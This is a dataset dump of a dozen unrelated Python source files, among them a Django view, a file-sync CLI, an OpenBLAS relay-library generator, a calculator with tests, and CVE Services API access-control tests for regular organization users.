id stringlengths 1 8 | text stringlengths 6 1.05M | dataset_id stringclasses 1
value |
|---|---|---|
3268576 | <filename>apps/greencheck/views.py
from datetime import date
from datetime import timedelta
from django.conf import settings
from google.cloud import storage
from django.views.generic.base import TemplateView
class GreenUrlsView(TemplateView):
template_name = "green_url.html"
def fetch_urls(self):
client = storage.Client()
bucket_name = settings.PRESENTING_BUCKET
bucket = client.get_bucket(bucket_name)
blobs = bucket.list_blobs()
return [(b.name, b.public_url) for b in blobs]
@property
def urls(self):
'''
Setting the date two weeks in the future. Two weeks from now on
it will prefetch the urls again
'''
accessed_date = getattr(self, '_date', None)
if not accessed_date or self._date < date.today():
self._date = date.today() + timedelta(weeks=2)
self._urls = self.fetch_urls()
return self._urls
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['urls'] = self.urls
return context
| StarcoderdataPython |
250688 | import argparse
import ntpath
import os
from shutil import copyfile
def list_diff(li1, li2):
"""returns a list with the difference of 2 lists"""
return list(list(set(li1) - set(li2)) + list(set(li2) - set(li1)))
def get_files_from(location, pattern):
"""returns the files from a folder
you can specify the type of file given the pattern parameter the extension of the file"""
files_in_dir = []
# r=>root, d=>directories, f=>files
for r, d, f in os.walk(location):
for item in f:
if pattern:
if pattern in item:
files_in_dir.append(os.path.join(r, item))
else:
files_in_dir.append(os.path.join(r, item))
return files_in_dir
def copy_files_from_non_found_in_b_to_destination(results, destination):
"""copies the files in results['non_found_in_b'] to the destination"""
for non_found_in_b in results['non_found_files_in_b'] + results['corrupted_files']:
print("coping " + non_found_in_b + " ...")
copyfile(non_found_in_b, os.path.join(destination, ntpath.basename(non_found_in_b)))
print(non_found_in_b + " completed copy")
def print_compared_sizes(results):
"""prints the contents returned by compare_sizes()"""
for type_of_result in results:
if not results[type_of_result]:
print("There is no " + type_of_result)
else:
print(type_of_result)
for element in results[type_of_result]:
print('\t' + element)
def compare_sizes(loc_a, loc_b, pattern):
"""Compares sizes of the files in two directories from 2 locations, loc_a and loc_b
to specify the file type you can use the pattern argument to find by extension
returns a dictionary:
copied_files - list of files that are find in both directories
corrupted_files - list of files that have a different sizes in both directories
non_found_files_in_a - list of files not found in a but found in b
non_found_files_in_b - list of files not found in b but found in a
the lists have the file names found in loc_a except the non_found_files_in_a that are in loc_b"""
files_in_loc_a = get_files_from(loc_a, pattern)
files_in_loc_b = get_files_from(loc_b, pattern)
corrupted_files = []
copied_files = []
exists = False
for file_a in files_in_loc_a:
basename_file_a = ntpath.basename(file_a)
for file_b in files_in_loc_b:
if basename_file_a == ntpath.basename(file_b):
exists = True
if os.path.getsize(file_a) != os.path.getsize(file_b):
corrupted_files.append(file_a)
else:
copied_files.append(file_a)
if exists:
files_in_loc_b.remove(file_b)
exists = False
break
return {
'copied_files': copied_files,
'corrupted_files': corrupted_files,
'non_found_files_in_a': files_in_loc_b,
'non_found_files_in_b': list_diff(files_in_loc_a, copied_files + corrupted_files)
}
def delete_files(files):
for file in files:
os.remove(file)
print("File " + file + ' has deleted.')
if __name__ == "__main__":
# obs_location = '/home/onikenx/Videos/obs/aulas'
# drive_location = '/home/onikenx/Clouds/OneDrive/apontamentos-de-aula/extras/gravacoesdeaulas/A3S1'
parser = argparse.ArgumentParser(description='\tVerifyfiles verifies the files in 2 folders\n'
'the files can have a pattern to be identified\n'
'this program can also copy and delete after the copy has done.')
parser.add_argument('loc_a', type=str,
help='location a, from where the files are copied')
parser.add_argument('loc_b', type=str,
help='location b, where the files will be copied')
parser.add_argument('-e', '--expression', type=str,
help='expression that will be used to specify the files, '
'can be used to especify the extesion of the file')
parser.add_argument('-c', '--copy', action='store_true',
help='copies files from loc_a to loc_b')
parser.add_argument('-d', '--delete', action='store_true',
help='deletes files from folder a that already have been copied correctly')
parser.add_argument('-i', '--ignore', action='store_true',
help='ignores warning when deleting files')
# parser.add_argument('-s', '--show', action='store_true',
# help='shows information about the files, if done with -c and/or -d it will show before '
# 'and after operations')
args = parser.parse_args()
# Verifies that the directories exist
if not os.path.isdir(args.loc_a):
print("Dir '" + args.loc_a + "' does not exist.")
exit(1)
if not os.path.isdir(args.loc_b):
print("Dir '" + args.loc_b + "' does not exist.")
exit(1)
if args.copy:
results = compare_sizes(args.loc_a, args.loc_b, args.expression)
junction = results['corrupted_files'] + results['non_found_files_in_b']
if junction:
print("Files that gonna be copied:")
for file in junction:
print("\t" + file)
copy_files_from_non_found_in_b_to_destination(results, args.loc_b)
else:
print('there is no files to be copied')
if args.delete:
results = compare_sizes(args.loc_a, args.loc_b, args.expression)
if results['copied_files']:
print("Files that gonna be deleted:")
for file in results['copied_files']:
print("\t" + file)
if args.ignore:
delete_files(results['copied_files'])
elif input("Are you really sure you want to delete these copied_files?[y/n]") == 'y':
delete_files(results['copied_files'])
else:
print('there is no files to be deleted')
if not args.delete and not args.copy:
results = compare_sizes(args.loc_a, args.loc_b, args.expression)
print_compared_sizes(results)
| StarcoderdataPython |
8126296 | <gh_stars>0
#!/usr/bin/python3 -u
# Copyright 2018-present Facebook, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import json
import optparse
import subprocess
import sys
parser = optparse.OptionParser()
parser.add_option("--buck-test-info")
parser.add_option("--jobs", type=int)
(options, args) = parser.parse_args()
def join_paths(paths):
return "[" + ", ".join(["'" + f.replace("\\", "\\\\") + "'" for f in paths]) + "]"
def convert_coverage_to_str(coverage):
return "[" + repr(coverage[0]) + ", " + join_paths(coverage[1]) + "]"
def convert_coverage_entries_to_str(coverage_entries):
return "[" + ", ".join([convert_coverage_to_str(c) for c in coverage_entries]) + "]"
with open(options.buck_test_info) as f:
test_infos = json.load(f)
coverage = test_infos[0]["needed_coverage"]
print(convert_coverage_entries_to_str(coverage))
| StarcoderdataPython |
8084392 | # Modularização em python
'''VANTAGENS
* ORGANIZAÇÃO DO CÓDIGO
* FACILIDADE DE MANUTENÇÃO
* OCULTAÇÃO DE CÓDIGO DETALHADO
* REUTILIZAÇÃO EM OUTROS PROJETOS'''
'''Para se utilizar de modulos se cria um arquivo com as funções
e quando se quiser usar das mesmas se importa deste arquivo as funçoes para determindado
programa exemplo
Arquivo: uteis
(import uteis)'''
def fatorial(n):
f=1
for c in range(1,n+1):
f*=c
return f
num=int(input("Digite um valor "))
fat=fatorial(num)
print(f"O fatorial de {num} é {fat}") | StarcoderdataPython |
11255818 | import typing as t
from werkzeug.datastructures import Headers
from werkzeug.wrappers import BaseResponse
_str_bytes = t.Union[str, bytes]
_data_type = t.Union[
_str_bytes,
BaseResponse,
t.Dict[str, t.Any],
t.Callable[
[t.Dict[str, t.Any], t.Callable[[str, t.List[t.Tuple[str, str]]], None]],
t.Iterable[bytes],
],
]
_status_type = t.Union[int, _str_bytes]
_headers_type = t.Union[
Headers,
t.Dict[_str_bytes, _str_bytes],
t.Iterable[t.Tuple[_str_bytes, _str_bytes]],
]
view_return_type = t.Union[
_data_type,
t.Tuple[_data_type],
t.Tuple[_data_type, _status_type],
t.Tuple[_data_type, _headers_type],
t.Tuple[_data_type, _status_type, _headers_type],
]
| StarcoderdataPython |
3389903 | """
Name: <NAME>
CIS 41A Spring 2020
Unit E Take-Home Assignment
"""
# Second Script – Guessing Game
# Write a script that plays a simple guessing game.
# The script will generate a secret number from 1 to 100, inclusive, and the user will have to guess the number.
# After each guess, the script will tell the user if they are high, low, or correct.
# If they are correct, the script will congratulate the user, tell them how many guesses they took, and then end the script.
# Hint: most of the game code will be in a loop that repeats until the correct number is guessed.
# To generate the secret number, you will need to use the randint function from Python's Random module, as follows:
# import random
#
# #this generates a random int from 1-100, inclusive
# secretNum = random.randint(1,100)
# Example output:
#
# Welcome to the guessing game.
# You need to guess a number from 1 to 100.
# What is your guess? 50
# Guess is too low.
# What is your guess? 75
# Guess is too low.
# What is your guess? 87
# Guess is too high.
# What is your guess? 81
# Guess is too low.
# What is your guess? 84
# Guess is too low.
# What is your guess? 85
# Congratulations!
# You guessed the secret number in 6 guesses!
import random
secretNum = random.randint(1,101)
print("Welcome to the guessing game")
print("You need to guess a number from 1 to 100.")
count = 0
while True:
num = int(input("What is your guess? "))
count += 1
if num > secretNum:
print("Guess is too high")
elif num < secretNum:
print("Guess is too low")
elif num == secretNum:
print("Congratulations!")
break
print(f"You guessed the secret number in {count} guesses!")
print("You guessed the secret number in {} guesses!".format(count))
"""
Execution results:
/usr/bin/python3 /Users/jakkus/PycharmProjects/CIS41A/CIS41A_UNITE_TAKEHOME_ASSIGNMENT_2.py
Welcome to the guessing game
You need to guess a number from 1 to 100.
What is your guess? 50
Guess is too high
What is your guess? 30
Guess is too low
What is your guess? 40
Guess is too low
What is your guess? 45
Guess is too high
What is your guess? 44
Guess is too high
What is your guess? 41
Guess is too low
What is your guess? 42
Congratulations!
You guessed the secret number in 7 guesses!
Process finished with exit code 0
""" | StarcoderdataPython |
6474025 | <gh_stars>0
# -*- codeing: utf-8 -*-
class Calculator(object):
def calculate(self, src):
if len (src) == 0:
return 0
else:
return self._parse_expression(src)
def _parse_expression(self, src):
num_left = self._parse_term(src)
result = num_left[0]
src = num_left[1]
while len(src) > 0:
sign = src[0]
if sign == '+':
num_left = self._parse_term(src[1:len(src)])
result += num_left[0]
src = num_left[1]
elif sign == '-':
num_left = self._parse_term(src[1:len(src)])
result -= num_left[0]
src = num_left[1]
else:
break
return result
def _parse_term(self, src):
num_left = self._parse_arg(src)
result = num_left[0]
src = num_left[1]
while len(src) > 0:
sign = src[0]
if sign == '*':
num_left = self._parse_arg(src[1:len(src)])
result *= num_left[0]
src = num_left[1]
elif sign == '/':
num_left = self._parse_arg(src[1:len(src)])
result /= num_left[0]
src = num_left[1]
else:
break
return (result, src)
def _parse_arg(self, src):
length = len (src)
index = 0
while index < length and src[index] != '+' and src[index] != '-' and src[index] != '*' and src[index] != '/':
index += 1
return (int(src[0:index]), src[index:length])
import unittest
class CalculatorTest(unittest.TestCase):
def setUp(self):
self.calculator = Calculator()
def test_calculates_0_when_given_an_empty_string(self):
self.assertEqual(0, self.calculator.calculate(""))
def test_calculates_a_number(self):
self.assertEqual(123, self.calculator.calculate("123"))
def test_calculates_addtion(self):
self.assertEqual(23, self.calculator.calculate("20+3"))
def test_calculates_subtraction(self):
self.assertEqual(17, self.calculator.calculate("20-3"))
def test_calculates_multiplication(self):
self.assertEqual(33, self.calculator.calculate("11*3"))
def test_calculates_division(self):
self.assertEqual(5, self.calculator.calculate("10/2"))
def test_calculates_multiple_operations(self):
self.assertEqual(23, self.calculator.calculate("36+2-5*4+40/8"))
| StarcoderdataPython |
6643149 | #!/usr/bin/python3
'''
OpenBLAS Relay Library Generator
Copyright (C) 2019 <NAME> <<EMAIL>>
License: MIT/Expat
Julia decided to mangle the symbols of the vendored copy of openblas
(INTERFACE64=1). I didn't read all the past discussions but in fact the symbol
mangling introduced difficulty in distribution packaging, and the mangling rule
is not standarlized yet.
I'm been updating the whole BLAS/LAPACK ecosystem on Debian(Ubuntu) since long
time ago. Our original plan was to provide libopenblas64.so without symbol
mangling, because MKL doesn't mangle the symbols and we expect every
BLAS/LAPACK implementation could be used as a drop-in replacement in the
system.
To provide support for Julia's libopenblas64_.so, indeed we could compile
src:openblas again with slightly different configuration, but then we will have
to build it 7 times (32/64-bit indexing * serial,pthread,openmp). And the
one compiled for Julia will be almost a duplicated one.
I'm trying to generate a "relay" library to provide ABIs like "sgemm_64_" which
immediately calls the "sgemm_" from libopenblas64.so (no mangling). The "relay"
library can be compiled as "libopenblas64_.so.0" with a correcponding SONAME,
and linked against "libopenblas64.so.0". So we can reuse a existing
64-bit-indexing openblas.
With slight tweaks, this library can also work with MKL.
'''
import re
import sys
import os
import argparse
def read_mkl_headers(dirname: str = '/usr/include/mkl') -> dict:
'''
Read the MKL header files: mkl_{,c}blas.h, mkl_lapack{,e}.h
'''
headers = {}
for key in ('mkl_blas', '<KEY>', 'mkl_lapack', 'mkl_lapacke'):
with open(os.path.join(dirname, key + '.h'), 'rt') as f:
headers[key] = f.read()
return headers
def generate_relay_lib(headers: dict = {}, opts: dict = {}) -> str:
'''
Generate the Relay Library C Code
'''
lib = []
lib.extend(f'''
typedef struct _complex8 {{ float* real; float* imag; }} complex8;
typedef struct _complex16 {{ double* real; double* imag; }} complex16;
typedef {opts['int']} (*C_SELECT_FUNCTION_1) ( const complex8* );
typedef {opts['int']} (*C_SELECT_FUNCTION_2) ( const complex8*, const complex8* );
typedef {opts['int']} (*D_SELECT_FUNCTION_2) ( const double*, const double* );
typedef {opts['int']} (*D_SELECT_FUNCTION_3) ( const double*, const double*, const double* );
typedef {opts['int']} (*S_SELECT_FUNCTION_2) ( const float*, const float* );
typedef {opts['int']} (*S_SELECT_FUNCTION_3) ( const float*, const float*, const float* );
typedef {opts['int']} (*Z_SELECT_FUNCTION_1) ( const complex16* );
typedef {opts['int']} (*Z_SELECT_FUNCTION_2) ( const complex16*, const complex16* );
void openblas_set_num_threads64_(int num_threads) {{ openblas_set_num_threads(num_threads); }};
int openblas_get_num_threads64_(void) {{ openblas_get_num_threads(); }};
int openblas_get_num_procs64_(void) {{ openblas_get_num_procs(); }};
char* openblas_get_config64_(void) {{ openblas_get_config(); }};
char* openblas_get_corename64_(void) {{ openblas_get_corename(); }};
int openblas_get_parallel64_(void) {{ openblas_get_parallel(); }};
'''.split('\n'))
if 'blas' in opts['abi'].split(','):
for api in re.findall('\w+?\s+[sdczlix][a-z0-9]+\(.*?\)\s*;',
headers['mkl_blas'], flags=re.DOTALL):
if '#' in api:
continue
api = ' '.join(api.replace('\n', ' ').split())
api = re.sub('MKL_INT', opts['int'], api)
api = re.sub('MKL_Complex8', 'complex8', api)
api = re.sub('MKL_Complex16', 'complex16', api)
tp, name, args = re.match(
r'(\w+?)\s+([sdczlix][a-z0-9]+)\((.*?)\)\s*;', api).groups()
argnames = ', '.join([x.split()[-1].replace('*', '')
for x in args.split(',')])
lib.extend(f'''
{tp} {name+'_'+opts['dmangle']} (
{args})
{{
{'return' if 'void'!=tp else ''} {name+'_'+opts['smangle']}({argnames});
}};
'''.split('\n'))
print(
'RELAY',
name +
'_' +
opts['smangle'],
'->',
name +
'_' +
opts['dmangle'],
'(',
argnames,
')')
if 'cblas' in opts['abi'].split(','):
raise NotImplementedError
if 'lapack' in opts['abi'].split(','):
for api in re.findall('\w+?\s+[sdcz][a-z0-9]+_\(.*?\)\s*;',
headers['mkl_lapack'], flags=re.DOTALL):
api = ' '.join(api.replace('\n', ' ').split())
api = re.sub('MKL_INT', opts['int'], api)
api = re.sub('MKL_Complex8', 'complex8', api)
api = re.sub('MKL_Complex16', 'complex16', api)
api = re.sub('MKL_', '', api)
tp, name, args = re.match(
r'(\w+?)\s+([sdcz][a-z0-9]+_)\((.*?)\)\s*;', api).groups()
argnames = ', '.join([x.split()[-1].replace('*', '')
for x in args.split(',')])
argnames = '' if argnames == 'void' else argnames
lib.extend(f'''
{tp} {name+opts['dmangle']} (
{args})
{{
{'return' if 'void'!=tp else ''} {name+opts['smangle']}({argnames});
}};
'''.split('\n'))
print('RELAY', name +
opts['smangle'], '->', name +
opts['dmangle'], '(', argnames, ')')
if 'lapacke' in opts['abi'].split(','):
raise NotImplementedError
return '\n'.join(lib)
if __name__ == '__main__':
# parse arguments
ag = argparse.ArgumentParser()
ag.add_argument('-A', '--abi', type=str, default='blas,lapack',
help='Set of ABIs that the relay library should provide')
ag.add_argument('-o', '--output', type=str, default='./openblas-relay.c')
ag.add_argument('--mkl', type=str, default='/usr/include/mkl')
ag.add_argument('--int', type=str, default='long')
ag.add_argument('--smangle', type=str, default='',
help='Mangle the source symbol')
ag.add_argument('--dmangle', type=str, default='64_',
help='Mangle the destination symbol')
ag = vars(ag.parse_args(sys.argv[1:]))
# generate the library
headers = read_mkl_headers(ag['mkl'])
with open(ag['output'], 'wt') as f:
f.write(generate_relay_lib(headers, ag))
os.system('gcc -flto -O2 -g -shared -fPIC openblas-relay.c -o libopenblas64_.so.0 -L. -lopenblas64 -Wno-implicit-function-declaration -Wl,-soname -Wl,libopenblas64_.so.0')
os.unlink('openblas-relay.c')
| StarcoderdataPython |
3331392 | # -*- coding: utf-8 -*-
import os
class Constants():
time_to_leave_file = '/tmp/cosycar_will_leave_at.txt'
weather_storage_file = '/tmp/cosycar_weather.txt'
weather_interval = 15
log_format = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
cfg_file_path = '.config'
cfg_file_name = 'cosycar.cfg'
home_dir = os.environ['HOME']
cfg_file = os.path.join(home_dir, cfg_file_path, cfg_file_name)
| StarcoderdataPython |
8047517 | # politician/urls.py
# Brought to you by <NAME>. Be good.
# -*- coding: UTF-8 -*-
from . import views_admin
from django.conf.urls import url
urlpatterns = [
url(r'^$', views_admin.politician_list_view, name='politician_list',),
url(r'^edit_process/$', views_admin.politician_edit_process_view, name='politician_edit_process'),
url(r'^delete/', views_admin.politician_delete_process_view, name='politician_delete_process'),
url(r'^import/$',
views_admin.politicians_import_from_master_server_view, name='politicians_import_from_master_server'),
url(r'^new/$', views_admin.politician_new_view, name='politician_new'),
url(r'^(?P<politician_id>[0-9]+)/edit/$', views_admin.politician_edit_view, name='politician_edit'),
url(r'^(?P<politician_id>[0-9]+)/retrieve_photos/$',
views_admin.politician_retrieve_photos_view, name='politician_retrieve_photos'),
# url(r'^(?P<politician_id>[0-9]+)/tag_new/$', views.politician_tag_new_view, name='politician_tag_new'),
# url(r'^(?P<politician_id>[0-9]+)/tag_new_process/$',
# views.politician_tag_new_process_view, name='politician_tag_new_process'),
# url(r'^(?P<pk>[0-9]+)/add_tag/$', views.PoliticianAddTagView.as_view(), name='politician_add_tag'),
] | StarcoderdataPython |
8149326 | import pyOcean_cpu as ocean
# Type casting applied to storage objects
s = ocean.asTensor([1,2,3]).storage
print(s)
t = ocean.int8(s)
print(t)
ocean.float(s, True)
print(s)
| StarcoderdataPython |
1801615 | # Tests in this file use an Org admin user provided by a Pytest fixture. The
# tests here should be a subset of the secretariat tests, since the CNA of last
# resort should always be able to perform any root CNA functionality in
# addition to functionality reserved for the CNA of last resort.
import json
import requests
import uuid
from src import env, utils
from src.test.org_user_tests.org import (ORG_URL, create_new_user_with_new_org_by_uuid,
create_new_user_with_new_org_by_shortname,
post_new_org_user, post_new_org)
from src.utils import (assert_contains, ok_response_contains,
ok_response_contains_json, response_contains,
response_contains_json)
#### PUT /org/:shortname/user/:username ####
def test_regular_user_update_name_and_username(reg_user_headers):
""" regular users can update their name & username """
org = reg_user_headers['CVE-API-ORG']
user = reg_user_headers['CVE-API-USER']
new_username = str(uuid.uuid4()) # used in query
res = requests.put(
f'{env.AWG_BASE_URL}{ORG_URL}/{org}/user/{user}?name.first=aaa&name.last=bbb&name.middle=ccc&name.suffix=ddd',
headers=reg_user_headers
)
assert res.status_code == 200
assert json.loads(res.content.decode())['updated']['name']['first'] == 'aaa'
assert json.loads(res.content.decode())['updated']['name']['last'] == 'bbb'
assert json.loads(res.content.decode())['updated']['name']['middle'] == 'ccc'
assert json.loads(res.content.decode())['updated']['name']['suffix'] == 'ddd'
res = requests.put(
f'{env.AWG_BASE_URL}{ORG_URL}/{org}/user/{user}?new_username={new_username}',
headers=reg_user_headers
)
assert res.status_code == 200
assert json.loads(res.content.decode())['updated']['username'] == new_username
def test_regular_user_cannot_update_for_another_user(reg_user_headers):
""" regular users cannot update information of another user of the same organization """
org = reg_user_headers['CVE-API-ORG']
user = reg_user_headers['CVE-API-USER']
user2 = str(uuid.uuid4())
res = post_new_org_user(org, user2) # creating a user with same org as regular user
assert res.status_code == 200
user_name = str(uuid.uuid4()) # create a new name to give to second user
res = requests.put(
f'{env.AWG_BASE_URL}{ORG_URL}/{org}/user/{user2}?new_username={user_name}',
headers=reg_user_headers
)
assert res.status_code == 403
response_contains_json(res, 'error', 'NOT_SAME_USER_OR_SECRETARIAT')
def test_regular_user_cannot_update_duplicate_user_with_new_username(reg_user_headers):
""" regular users cannot update a user's username if that user already exist """
org = reg_user_headers['CVE-API-ORG']
user1 = reg_user_headers['CVE-API-USER']
user2 = str(uuid.uuid4())
res = post_new_org_user(org, user2) # creating a user with same org as regular user
assert res.status_code == 200
res = requests.put(
f'{env.AWG_BASE_URL}{ORG_URL}/{org}/user/{user1}?new_username={user2}',
headers=reg_user_headers
)
assert res.status_code == 403
response_contains_json(res, 'error', 'DUPLICATE_USERNAME')
def test_regular_user_cannot_update_organization_with_new_shortname(reg_user_headers):
""" regular users cannot update organization """
user = reg_user_headers['CVE-API-USER']
org1 = reg_user_headers['CVE-API-ORG']
org2 = str(uuid.uuid4())
res = requests.put(
f'{env.AWG_BASE_URL}{ORG_URL}/{org1}/user/{user}?org_shortname={org2}',
headers=reg_user_headers
)
assert res.status_code == 403
response_contains_json(res, 'error', 'NOT_ALLOWED_TO_CHANGE_ORGANIZATION')
def test_regular_user_cannot_update_active_state(reg_user_headers):
""" regular user cannot change its own active state """
org = reg_user_headers['CVE-API-ORG']
user = reg_user_headers['CVE-API-USER']
res = requests.put(
f'{env.AWG_BASE_URL}{ORG_URL}/{org}/user/{user}?active=false',
headers=reg_user_headers
)
assert res.status_code == 403
response_contains_json(res, 'error', 'NOT_ORG_ADMIN_OR_SECRETARIAT')
def test_regular_user_cannot_add_role(reg_user_headers):
""" regular users cannot add role """
org = reg_user_headers['CVE-API-ORG']
user = reg_user_headers['CVE-API-USER']
res = requests.put(
f'{env.AWG_BASE_URL}{ORG_URL}/{org}/user/{user}?active_roles.add=admin', # adding role
headers=reg_user_headers
)
assert res.status_code == 403
response_contains_json(res, 'error', 'NOT_ORG_ADMIN_OR_SECRETARIAT')
def test_regular_user_cannot_remove_role(reg_user_headers):
""" regular users cannot remove role """
org = reg_user_headers['CVE-API-ORG']
user = reg_user_headers['CVE-API-USER']
res = requests.put(
f'{env.AWG_BASE_URL}{ORG_URL}/{org}/user/{user}?active_roles.remove=admin', # removing role
headers=reg_user_headers
)
assert res.status_code == 403
response_contains_json(res, 'error', 'NOT_ORG_ADMIN_OR_SECRETARIAT')
def test_regular_user_cannot_update_user_org_dne(reg_user_headers):
""" regular user cannot update a user from an org that doesn't exist """
org = str(uuid.uuid4())
user = reg_user_headers['CVE-API-USER']
res = requests.put(
f'{env.AWG_BASE_URL}{ORG_URL}/{org}/user/{user}',
headers=reg_user_headers
)
assert res.status_code == 404
response_contains_json(res, 'error', 'ORG_DNE_PARAM')
def test_reg_user_cannot_update_user_dne(reg_user_headers):
""" regular user cannot update a user that doesn't exist """
org = reg_user_headers['CVE-API-ORG']
user = str(uuid.uuid4())
res = requests.put(
f'{env.AWG_BASE_URL}{ORG_URL}/{org}/user/{user}',
headers=reg_user_headers
)
assert res.status_code == 404
response_contains_json(res, 'error', 'USER_DNE')
#### POST /org/:shortname/user ###
def test_reg_user_cannot_create_user(reg_user_headers):
""" regular user cannot create another user """
org = reg_user_headers['CVE-API-ORG']
user_name = str(uuid.uuid4())
res = requests.post(
f'{env.AWG_BASE_URL}{ORG_URL}/{org}/user',
headers=reg_user_headers,
json={'username': user_name}
)
assert res.status_code == 403
response_contains_json(res, 'error', 'NOT_ORG_ADMIN_OR_SECRETARIAT')
#### PUT /org/:shortname ####
def test_reg_user_cannot_update_org(reg_user_headers):
""" regular user cannot update an organization """
org = str(uuid.uuid4())
res = requests.put(
f'{env.AWG_BASE_URL}{ORG_URL}/{org}',
headers=reg_user_headers
)
assert res.status_code == 403
response_contains_json(res, 'error', 'SECRETARIAT_ONLY')
#### GET /org/:identifier ####
def test_reg_user_can_view_same_org(reg_user_headers):
""" regular users can view the organization they belong to """
org = reg_user_headers['CVE-API-ORG']
res = requests.get(
f'{env.AWG_BASE_URL}{ORG_URL}/{org}',
headers=reg_user_headers
)
ok_response_contains_json(res, 'short_name', org)
def test_reg_user_cannot_view_another_org(reg_user_headers):
""" regular users cannot view an organization they don't belong to """
org = str(uuid.uuid4())
res = requests.get(
f'{env.AWG_BASE_URL}{ORG_URL}/{org}',
headers=reg_user_headers
)
assert res.status_code == 403
response_contains_json(res, 'error', 'NOT_SAME_ORG_OR_SECRETARIAT')
#### GET /org ####
def test_reg_user_cannot_view_orgs(reg_user_headers):
""" regular users cannot view all organizations """
res = requests.get(
f'{env.AWG_BASE_URL}{ORG_URL}',
headers=reg_user_headers
)
assert res.status_code == 403
response_contains_json(res, 'error', 'SECRETARIAT_ONLY')
#### GET /org/:shortname/users ####
def test_reg_user_can_view_users_same_org(reg_user_headers):
""" regular users can view users of the same organization """
org = reg_user_headers['CVE-API-ORG']
res = requests.get(
f'{env.AWG_BASE_URL}{ORG_URL}/{org}/users',
headers=reg_user_headers
)
assert res.status_code == 200
assert len(json.loads(res.content.decode())['users']) > 0
def test_reg_user_cannot_view_users_org_dne(reg_user_headers):
""" regular users cannot view users of an organization that doesn't exist """
org = str(uuid.uuid4())
res = requests.get(
f'{env.AWG_BASE_URL}{ORG_URL}/{org}/users',
headers=reg_user_headers
)
assert res.status_code == 404
response_contains_json(res, 'error', 'ORG_DNE_PARAM')
def test_reg_user_cannot_view_users_another_org(reg_user_headers):
""" regular users cannot view users of another organization """
org = str(uuid.uuid4())
res = post_new_org(org, org)
assert res.status_code == 200
res = requests.get(
f'{env.AWG_BASE_URL}{ORG_URL}/{org}/users',
headers=reg_user_headers
)
assert res.status_code == 403
response_contains_json(res, 'error', 'NOT_SAME_ORG_OR_SECRETARIAT')
#### GET /org/:shortname/user/:username ####
def test_reg_user_can_view_users_same_org(reg_user_headers):
""" regular users can view users of the same organization """
org = reg_user_headers['CVE-API-ORG']
user = str(uuid.uuid4())
res = post_new_org_user(org, user)
assert res.status_code == 200
res = requests.get(
f'{env.AWG_BASE_URL}{ORG_URL}/{org}/user/{user}',
headers=reg_user_headers
)
ok_response_contains_json(res, 'username', user)
def test_reg_user_cannot_view_user_from_another_org(reg_user_headers):
""" regular users cannot view users from another organization """
org, user = create_new_user_with_new_org_by_uuid()
res = requests.get(
f'{env.AWG_BASE_URL}{ORG_URL}/{org}/user/{user}',
headers=reg_user_headers
)
assert res.status_code == 403
response_contains_json(res, 'error', 'NOT_SAME_ORG_OR_SECRETARIAT')
def test_reg_user_cannot_view_user_dne(reg_user_headers):
""" regular user cannot view user that doesn't exist """
org = reg_user_headers['CVE-API-ORG']
user = str(uuid.uuid4())
res = requests.get(
f'{env.AWG_BASE_URL}{ORG_URL}/{org}/user/{user}',
headers=reg_user_headers
)
assert res.status_code == 404
response_contains_json(res, 'error', 'USER_DNE')
#### GET /org/:shortname/id_quota ####
def test_reg_user_can_get_org_id_quota(reg_user_headers):
""" regular users can see their organization's cve id quota """
org = reg_user_headers['CVE-API-ORG']
res = requests.get(
f'{env.AWG_BASE_URL}{ORG_URL}/{org}/id_quota',
headers=reg_user_headers
)
ok_response_contains(res, 'id_quota')
ok_response_contains(res, 'total_reserved')
ok_response_contains(res, 'available')
def test_reg_user_cannot_get_another_org_id_quota(reg_user_headers):
""" regular users cannot see an organization's cve id quota they don't belong to """
org = str(uuid.uuid4())
user = str(uuid.uuid4())
create_new_user_with_new_org_by_shortname(org, user)
res = requests.get(
f'{env.AWG_BASE_URL}{ORG_URL}/{org}/id_quota',
headers=reg_user_headers
)
assert res.status_code == 403
response_contains_json(res, 'error', 'NOT_SAME_ORG_OR_SECRETARIAT')
#### PUT /org/:shortname/user/:username/reset_secret ####
def test_regular_user_reset_secret(reg_user_headers):
""" regular users can update their secret """
org = reg_user_headers['CVE-API-ORG']
user = reg_user_headers['CVE-API-USER']
res = requests.put(
f'{env.AWG_BASE_URL}{ORG_URL}/{org}/user/{user}/reset_secret',
headers=reg_user_headers
)
ok_response_contains(res, 'API-secret')
def test_regular_user_cannot_reset_secret_of_another_user(reg_user_headers):
""" regular user cannot update the secret of another user """
org = reg_user_headers['CVE-API-ORG']
user = str(uuid.uuid4())
res = post_new_org_user(org, user) # creating a user
assert res.status_code == 200
res = requests.put(
f'{env.AWG_BASE_URL}{ORG_URL}/{org}/user/{user}/reset_secret',
headers=reg_user_headers
)
assert res.status_code == 403
response_contains_json(res, 'error', 'NOT_SAME_USER_OR_SECRETARIAT')
def test_regular_user_cannot_reset_secret_user_org_dne(reg_user_headers):
""" regular user cannot reset the secret of a user from an org that doesn't exist """
org = str(uuid.uuid4())
user = reg_user_headers['CVE-API-USER']
res = requests.put(
f'{env.AWG_BASE_URL}{ORG_URL}/{org}/user/{user}/reset_secret',
headers=reg_user_headers
)
assert res.status_code == 404
response_contains_json(res, 'error', 'ORG_DNE_PARAM')
def test_regular_user_cannot_reset_secret_user_dne(reg_user_headers):
""" regular user cannot reset the secret of a user that doesn't exist """
org = reg_user_headers['CVE-API-ORG']
user = str(uuid.uuid4())
res = requests.put(
f'{env.AWG_BASE_URL}{ORG_URL}/{org}/user/{user}/reset_secret',
headers=reg_user_headers
)
assert res.status_code == 404
response_contains_json(res, 'error', 'USER_DNE')
def test_regular_user_cannot_reset_admin_user_secret(reg_user_headers, org_admin_headers):
""" regular user tries resetting admin user's secret, fails and admin user's role remains preserved """
reg_org = reg_user_headers['CVE-API-ORG']
user = org_admin_headers['CVE-API-USER']
res = post_new_org_user(reg_org, user) # creating the user
assert res.status_code == 200
res = requests.put(
f'{env.AWG_BASE_URL}{ORG_URL}/{reg_org}/user/{user}/reset_secret',
headers=reg_user_headers
)
assert res.status_code == 403
response_contains_json(res, 'error', 'NOT_SAME_USER_OR_SECRETARIAT')
# Check that user's admin role is preserved
